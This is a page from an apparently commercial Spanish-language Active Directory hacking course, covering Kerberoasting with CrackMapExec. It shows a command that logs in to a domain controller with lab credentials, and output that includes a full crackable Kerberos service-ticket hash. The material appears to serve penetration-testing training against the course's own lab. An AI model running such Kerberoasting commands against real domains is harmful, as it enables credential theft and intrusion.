Hacking en Active Directory - [CPAD-100]
Comprar cursoYouTubeTwitterLinkedIn
  • La Biblia del Hacking en ACTIVE DIRECTORY
    • ADVERTENCIA
    • Conoce a tu academia
    • Conoce a tu instructor
    • Aprende con nuestro curso
      • ¿Que Significa CPAD-100?
  • Introducción a Directorio Activo – (AD)
    • Fundamentos de AD
    • Componentes importantes de un Active Directory
    • Principales conceptos de un Directorio Activo
      • Diferencias entre GPO y ACL
    • ¿Por qué los atacantes van tras los controladores de dominio?
      • Ransomware en AD
    • Introduccion a Kerberos
      • Capa de transporte
      • Agentes
      • Claves de cifrado
      • Tickets
      • Privilege Attribute Certificate (PAC)
      • Mensajes
    • Proceso de autenticación en Kerberos
      • Kerberos Explicado con Parques y Atracciones
    • ¿Como funciona Kerberos?
    • S4U (Service for User)
    • Usuarios y grupo por defectos en AD
    • Biblia de comandos para el CPAD
  • Fundamentos Ofensivos
    • Introduccion al Curso Profesional de Pentesting para Juniors - [CPPJ]
    • ¿Qué es un Red Team?
      • Assume breach
    • ¿Qué es un Pentesting?
    • Instalacion de Kali Linux
      • Utilizando IP publica para auditorias reales
    • Transferencias de archivos
    • Cyber Kill Chain
    • MITRE
      • Ejemplo teorico
  • Enumeracion Externa
    • Credenciales expuestas
    • La importancia de la enumeracion en un red team
    • Reconocimiento y Recopilacion
    • Activos de informacion publicos
      • DNS records
      • Redes sociales
  • Vectores de ataque fisico
    • Physical Red Team Operations
    • Que es la intrusion fisica
      • Vectores de ataque
    • Rubber Ducky
    • Stuxnet
    • Introduccion a Flipper Zero
      • BadUSB
  • Introduccion Al Hacking Web
    • Tu primer Red Team contra Active Directory
      • Objetivos
      • CyberKillChain en CPAD
    • La importancia del hacking web en un red team contra AD
    • Curso gratuito con los labs de PortSwigger
    • Enumeracion sobre un servidor web desplegado en IIS
    • Inyeccion de comandos desde un formulario web
  • Post-explotacion en windows
    • Fundamentos de la Enumeracion local en un Windows
    • Enumeracion basica desde una WebShell
    • Fundamentos de escalacion de privilegios en Windows
      • ¿Que son altos privilegios en windows?
      • ¿Que son bajos privilegios en windows?
      • Identificando mis privilegios actuales
      • Tokens de acceso en Windows
      • Niveles de integridad en procesos de Windows
    • Privilegios en Windows
    • Abusando de los privilegios SeImpersonatePrivilege SeAssignPrimaryTokenPrivilege
    • Introduccion al Curso Profesional de Pentesting contra Windows - [CPPW]
    • NT AUTHORITY\SYSTEM
    • Reverse Shell en PowerShell Indetectable
      • Introduccion al Curso RedTeam Ops Developer Senior
    • Migracion de WebShell a BurpSuite
    • Migracion de WebShell a Reverse Shell via PowerShell
    • Diferencia entre una WebShell y Reverse Shell
    • Introducción a PowerUp
    • Introducción a WinPEAS
  • Persistencia en Windows Local
    • Introduccion a la post-explotación y persistencia en Windows
    • Creacion de usuarios con net
    • Qué es Mimikatz
      • LSASS
      • Extraccion de credenciales con Mimikatz con binario
      • Extraccion de credenciales con Mimikatz con PowerShell
      • Resolucion de errores con Mimikatz
      • Mimikatz en la actualidad
  • Enumeracion en AD
    • Identificando un Domain Controller (DC) en red
    • ActiveDirectoryRights en el Contexto de Red Team
    • Enumeracion manual con GUI
    • Enumeracion con PowerShell ofensivo
      • Guia de comandos de PowerView.ps1
        • Enumeracion de usuarios
        • Enumeracion de Grupos
        • Enumeracion de Computadores
        • Enumeracion de GPO
        • Enumeracion de ACL
      • Utilizando ADPeas
    • Enumeracion con AD Module DLL
    • Enumeracion con BloodHound
    • Enumeracion con klist
    • Security Identifiers (SIDs)
    • Distinguished Name o DN
  • Vulnerabilidades y ataques en AD
    • Fundamentos de vulnerabilidades en AD
    • Password Spraying
      • La importancia de generar contraseñas personalizadas
      • Kerbrute
    • Relay Attacks
      • ¿Que es NTLM?
      • Utilizando impacket-ntlmrelayx
        • Análisis de impacket-ntlmrelayx
    • Credenciales en descripcion
      • Utilizando CrackMapExec
      • Utilizando BloodHound
    • Kerberoasting
      • Utilizando BloodHound
      • Utilizando Rubeus
      • Utilizando Impacket-GetUserSPNs
      • Utilizando CrackMapExec
      • Utilizando PowerView
    • ASREProastable
      • Utilizando Rubeus
      • Utilizando CrackMapExec
      • Utilizando Impacket-GetNPUsers
      • CVE-2022-33679
    • Unconstrained Delegation
      • TrustedToAuthForDelegation vs TrustedForDelegation
    • Constrained Delegation
      • Usuario
      • Computadora
        • Utilizando Rubeus
    • DnsAdmins
      • Utilizando PowerView.ps1
      • Utilizando NET
      • Cargando una dll maliciosa con dnscmd
      • Generando una DLL maliciosa
    • LAPS Reader
    • (RBCD) Resource-based constrained
    • Abuso de ACL
      • Enumeracion con PowerView
      • Tipos de permisos
        • Tabla de Referencia de Permisos y Derechos en Active Directory
      • Access Control Entry (ACE)
      • WriteDacl sobre Computador
      • GenericAll sobre Grupo
      • GenericAll sobre usuario
      • GenericWrite sobre computador
    • Abuso de GPO
      • ¿Qué es SysVol?
      • Utilizando PowerView
      • Solicitando TGT para el usuario gpowrite.user
      • Utilizando SharpGPOAbuse
      • Forzando la actualizacion de GPO
    • Zerologon - CVE-2020-1472
  • Movimiento lateral
    • Fundamentos de movimiento lateral en AD
    • Impersonation
    • Pass-the-Hash (PtH)
      • Identificando servicios para realizar el PTH
      • Utilizando Evil-WinRm
      • Utilizando impacket-psexec
      • Utilizando RDP
  • Persistencia y post-explotacion en AD
    • Fundamentos de persistencia y la post-explotación en AD
    • DCSync
      • Extracción de Credenciales del Dominio de Active Directory
      • Utilizando CrackMapExec
      • Utilizando Mimikatz
      • Utilizando Impacket-secretsdump
    • Creacion de usuarios en el dominio con net
    • Silver Ticket
      • Service Principal Name (SPN)
      • Silver Ticket para CIFS
    • Golden Ticket
      • Diferencias entre Silver Ticket y Golden Ticket
      • ¿Que es KRBTGT?
      • Variantes del Golden Ticket
        • Golden Ticket tradicional utilizando Mimikatz
        • Golden Ticket Inter-realm TGT
    • Pass The Ticket
      • PTT en Linux
      • PTT en Windows
    • Diamond Ticket
    • Bosques y relaciones de confianza
      • TrustAttributes y TrustType
      • Enumeracion utilizando ADPeas.ps1
      • Enumeracion utilizando nltest
      • Enumeracion utilizando .NET Framework
      • Enumeracion utilizando con PowerView
      • Enumerando con SharpHound
  • Introduccion a la evasion de defensas
    • Fundamentos de evasión de defensas
    • Introduccion a UAC
      • Bypass UAC utilizando FodhelperUACBypass.ps1
      • Bypass utilizando Kerberos y SMBExec
    • Evasión de antivirus
      • Utilizando HoaxShell
    • Introduccion a LOLBAS
    • AMSI para Hackers
    • Utilizando IP publicas y dominios confiables para el almacenamiento de herramientas
    • Codificando tus comandos de PowerShell en base64
      • Transferencia de archivos con base64
    • Política de ejecución de PowerShell
    • Introduccion a Sysinternals
    • Introduccion a AppLocker
    • Apagando defensas basicas
  • Introduccion a ataques modernos en AD
    • Fundamentos de Azure Active Directory
    • DCSync utilizando MSOL
    • Introduccion al Curso de Pentesting Contra Azure - [CPAZ]
  • Introduccion al Blue Team en Active Directory
    • Blue Team y SOC
    • Introduccion al Curso Profesional de Blue Team - [CPBLT]
    • Introduccion a Sysmon
      • Deteccion de comportamiento anomalo con ElasticSearch
  • Muchas Gracias
    • 🛡️ ¡Muchísimas Gracias por Participar! 🛡️
    • Importante
Con tecnología de GitBook
En esta página

¿Te fue útil?

  1. Vulnerabilidades y ataques en AD
  2. Kerberoasting

Utilizando CrackMapExec

AnteriorUtilizando Impacket-GetUserSPNsSiguienteUtilizando PowerView

Última actualización hace 9 meses

¿Te fue útil?

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: . ¡Te esperamos para empezar este viaje juntos!

CrackMapExec tiene modulos muy interesantes que pueden ayudarnos durante un proceso de intrusion:

root@kali=> ./cme ldap 18.116.10.36 -u 'clearpass.user' -p 'Password@1' --kerberoast output.txt
SMB         18.116.10.36    445    FIRST-DC         [*] Windows 10.0 Build 17763 x64 (name:FIRST-DC) (domain:spartancybersec.corp) (signing:True) (SMBv1:False)
LDAP        18.116.10.36    389    FIRST-DC         [+] spartancybersec.corp\clearpass.user:Password@1 
LDAP        18.116.10.36    389    FIRST-DC         [*] Total of records returned 1                                                                                                                                          ccache.py:578
LDAP        18.116.10.36    389    FIRST-DC         sAMAccountName: roast.user memberOf:  pwdLastSet: 2023-09-28 21:03:36.264988 lastLogon:<never>
LDAP        18.116.10.36    389    FIRST-DC         $krb5tgs$23$*roast.user$SPARTANCYBERSEC.CORP$spartancybersec.corp/roast.user*$163208e7061ca0c42cd514b9d7973d40$099bf886f8c197e2e3423cdd9bc90299b666d5a56d183c321a567c4a161e980650a97c4edd8dac1a2c860acad7c310e0ce9218fafdd73c5e24297d170c615b13ec34ea0ad47ec68f05431ccce15d66097669b8093b688eb4fbac01d0180db04c996b55e41fd0572f01f7ec1e1871696ba52f6494274611520a85ea78c43a2e4c06e2a1ed00002b3d5b46a0bf8fe7214b271fc7e1f1f9f7f96554cb3b32488d3575ea6c0d66a9ea1cfd361c22c9fdda6e936925a720798aa33b3ec8fb2d5183dcd5328046bd4fd070f914b6a12efd324f120a6c8ef06d41d46f710bb67ce02da15f018580569a2dbc280a913d6b71462e9665e153e8c1a6a76b71661183b5f9f2a908c3d0adf966b14dad7b71521296cdbffa2c16600cea38ff984340702d5c2dc493d7ae6333cabe5570767ee83e616d91697a5d5f4ab6f9a74e9b1be25f350d8c608637ac422fdb60917eefa016567d3fe8178b783ba5d20b08812275757cf8beea65a1b0855c7ce4e6e04ca16a57be93e14f81c670a23ff22059445631dbcb92be35565efa265f2e4b763d7c2ba62d6897b4fc8016b464ab8d392f7e2cb7ae65ca60d7d6608816b10e0e0316dd4e3861dfdc9099928d1b5f86c8df9da51edb9a8224e02cfb096b212f37eb364b2dba635e8dfcc7f780bde482868adaf03b2892c045a80a18d70fbd5d9ee4b74cf1450aef8cd380e1fb97fa07254e42fff97a1ee7e11d33c50cdb43b6db398d60f3c526c15ccc4edfaaf0249c83d1b730b07b843f28d8d2d679f1acaaac488b63e6b3f171fe6c3d95b711744c1d996e46bb9349c1485d59a8006fb1c46b6b263d8d679ae16cbebdd77eff29a4f22b2269d17e0115160a146068ac83b54d670fdc0d3aaa6b1d1b781124b037394b894f06f79f34b4469e3d6610bf86f4eb20db991e6538e699340cbb4c3c92eb8d10797833ead29974824cce8838a775389547b949f5199550d464cfcacc5fc7538b2f6680ba2dd3dac37a63a434838be232077bb9bfaa4ffddc0360f8c8d8c3b65d8e88d8b04a9af5201de4598caccdb74b78b1ab94368ba8654a8429f14ef8984ed80075c5bcbd9dea4502c7b05746ff8ca6c59cb120e6c07e8abde49b9bdd57b40545408aac552a4a506f551149fda309cca5b5cef38f9b345df3db9cdd9f09e639c4cc14be75db5df0825d9143621fa3cc56b4b519935131db1556fe657527c25bbaea9fc8f907a0c5078531f3adff9affc7e8bb1e340e574666ce26a78f2b04280dbf46a4a8d68e986d25a7a531bd0b5688382a6c162562fdaa21dbc9c3d44a478b049f88d7446eedd674a04193600aaea5ca8b0acd86109d6c2d74d1400cb6edc826135ac6742c344246673f34f54f20602667524fb75146c2228d2bdd8f35fd4b78ba3d86fc2676141a07e0da76addd0c88892769cbd43c8ab502e10e863adb4e2e78b5caa4bc3702bece340393ae8c0aa2828165805809e0bb2b10356d4386e044d1fa4cfbd303b12f22c66b6ea626d50ff9bbd371d8721de5671be7925bf735c0966011fd210133f1f08e8744c4e7b7323f3ab0a74bbf4d15ad5eeccb8e76d2b48d3f0304

root@kali=> tail -1 /etc/hosts
18.116.10.36    first-dc.spartancybersec.corp spartancybersec.corp
https://wa.link/ej3kiu